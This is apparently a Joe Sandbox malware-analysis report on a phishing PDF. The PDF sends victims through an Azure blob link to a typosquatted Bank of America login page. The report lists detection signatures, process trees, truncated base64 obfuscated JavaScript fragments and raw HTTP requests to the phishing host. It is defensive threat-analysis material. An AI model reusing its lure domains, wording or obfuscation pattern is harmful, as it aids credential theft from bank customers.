Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0430tely.pdf

Overview

General Information

Sample name:0430tely.pdf
renamed because original name is a hash value
Original sample name:Unauthrizd Sign-ln Dtectd - nfirm unt Infrmtin Immditely.pdf
Analysis ID:1592118
MD5:9e8618badb9f66710a39c66e087b62df
SHA1:a52debd9dede1cf36e6a4d737cedcff98fb76804
SHA256:6fea71e67dbb477790e602b8456613405ad62c253d6c977b2c636f6e497a9b5b
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected landing page (webpage, office document or email)
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML page contains obfuscated script src
IP address seen in connection with other malware
Invalid T&C link found
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 5700 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\0430tely.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6820 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 5564 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1580,i,6253502165632248395,16397532995403406337,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • chrome.exe (PID: 7832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://confirmationonline.blob.core.windows.net/attestation/complete.html?1da72 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1788,i,3425846688857665517,9014097320282314136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: chromecache_208.14.drBinary or memory string: a = "-----BEGIN PUBLIC KEY-----\n" + (this.wordwrap(this.getPublicBaseKeyB64()) + "\n");memstr_c5d0a4f5-a

Phishing

barindex
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goJoe Sandbox AI: Score: 9 Reasons: The brand 'Bank of America' is a well-known financial institution., The legitimate domain for Bank of America is 'bankofamerica.com'., The URL 'online.access.secure.bankofamerlica.com' contains a misspelling of 'bankofamerica' as 'bankofamerlica'., The presence of multiple subdomains and the misspelling are common phishing tactics., The input fields 'User ID' and 'Password' are typical targets for phishing attempts. DOM: 3.2.pages.csv
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goJoe Sandbox AI: Score: 9 Reasons: The brand 'Bank of America' is a well-known financial institution., The legitimate domain for Bank of America is 'bankofamerica.com'., The provided URL 'online.access.secure.bankofamerlica.com' contains a misspelling of 'bankofamerica' as 'bankofamerlica'., The URL structure includes multiple subdomains which can be a tactic used in phishing., The presence of input fields for 'User ID' and 'Password' on a suspicious URL increases the risk of phishing. DOM: 3.3.pages.csv
Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'continue'
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: Number of links: 0
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://online.access.secure.bankofamerlica.com/secure/HTTP Parser: Base64 decoded: function _0x5f48(_0x2c5e02,_0xe19f15){var _0x1b34d0=_0x1b34();return _0x5f48=function(_0x5f482d,_0x502389){_0x5f482d=_0x5f482d-0x143;var _0x72c7d7=_0x1b34d0[_0x5f482d];return _0x72c7d7;},_0x5f48(_0x2c5e02,_0xe19f15);}(function(_0x471b0b,_0x52b3dd){var _0x...
Source: https://online.access.secure.bankofamerlica.com/secure/HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4NWY0OChfMHgyYzVlMDIsXzB4ZTE5ZjE1KXt2YXIgXzB4MWIzNGQwPV8weDFiMzQoKTtyZXR1cm4gXzB4NWY0OD1mdW5jdGlvbihfMHg1ZjQ4MmQsXzB4NTAyMzg5KXtfMHg1ZjQ4MmQ9XzB4NWY0ODJkLTB4MTQzO3ZhciBfMHg3MmM3ZDc9XzB4MWIzNGQwW18weDVmNDgyZF
Source: https://online.access.secure.bankofamerlica.com/secure/HTTP Parser: Script src: data:text/javascript;base64,dmFyIF8weDNmZDY5MD1fMHg0Y2VkOyhmdW5jdGlvbihfMHg4ZTVlOTgsXzB4NGFhOTEwKXt2YXIgXzB4MmJjNjY1PV8weDRjZWQsXzB4NDMwNGQ4PV8weDhlNWU5OCgpO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4MzA1MjJhPS1wYXJzZUludChfMHgyYmM2NjUoMHgzZDcpKS8weDErcGFyc2VJbn
Source: https://online.access.secure.bankofamerlica.com/secure/HTTP Parser: Script src: data:text/javascript;base64,dmFyIF8weDVkM2JjYj1fMHgyZmZlOyhmdW5jdGlvbihfMHgyMzhlYmEsXzB4M2Q4NzJhKXt2YXIgXzB4MTZlNGQ3PV8weDJmZmUsXzB4MzdiMzJjPV8weDIzOGViYSgpO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4M2YxYmFkPS1wYXJzZUludChfMHgxNmU0ZDcoMHgxMTMpKS8weDErLXBhcnNlSW
Source: https://online.access.secure.bankofamerlica.com/secure/HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4OTdjOChfMHgxNTEwOWIsXzB4MjYyNmRlKXtjb25zdCBfMHg1NDdlMDc9XzB4NTQ3ZSgpO3JldHVybiBfMHg5N2M4PWZ1bmN0aW9uKF8weDk3YzhmMSxfMHgyNjU4N2Epe18weDk3YzhmMT1fMHg5N2M4ZjEtMHgxN2M7bGV0IF8weDNhYjRlMj1fMHg1NDdlMDdbXzB4OTdjOG
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: Invalid link: Privacy
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: Invalid link: Privacy
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: Invalid link: Privacy
Source: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.jsHTTP Parser: /*! jquery v3.5.1 | (c) js foundation and other contributors | jquery.org/license */ ! function(e, t) { "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function(e) { if (!e.document) { throw new error("jquery requires a window with a document") } return t(e) } : t(e)}("undefined" != typeof window ? window : this, function(c, e) { var t = [], r = object.getprototypeof, s = t.slice, g = t.flat ? function(e) { return t.flat.call(e) } : function(e) { return t.concat.apply([], e) }, u = t.push, i = t.indexof, n = {}, o = n.tostring, v = n.hasownproperty, a = v.tostring, l = a.call(object), y = {}, m = function(e) { return "function" == typeof e && "number" != typeof e.nodetype }, x = function(e) { return null != e && e === e.window ...
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: <input type="password" .../> found
Source: https://online.access.secure.bankofamerlica.com/secure/HTTP Parser: No favicon
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: No <meta name="author".. found
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: No <meta name="author".. found
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: No <meta name="author".. found
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: No <meta name="copyright".. found
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: No <meta name="copyright".. found
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goHTTP Parser: No <meta name="copyright".. found
Source: global trafficTCP traffic: 192.168.2.16:59051 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewIP Address: 188.119.66.154 188.119.66.154
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /?ref=9854tjwe46 HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://confirmationonline.blob.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /secure/ HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://confirmationonline.blob.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; ref=9854tjwe46; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/secure/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://online.access.secure.bankofamerlica.com/secure/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global trafficHTTP traffic detected: GET /secure/secure.php HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global trafficHTTP traffic detected: GET /login/sign-in/signOnV2Screen.go HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /login/sign-in/signOnV2Screen.go HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://online.access.secure.bankofamerlica.com/secure/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/vipaa-v4-jawr.css HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/onetrust-style.css HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/special/css/loader.css HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/vipaa-v4-jawr.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/online-id-vipaa-module-enter-skin.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/mobile_llama.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/mobile_llama.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/pill.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/BOA.PNG HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/online-id-vipaa-module-enter-skin.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/vipaa-v4-jawr.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/gfootb-static-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
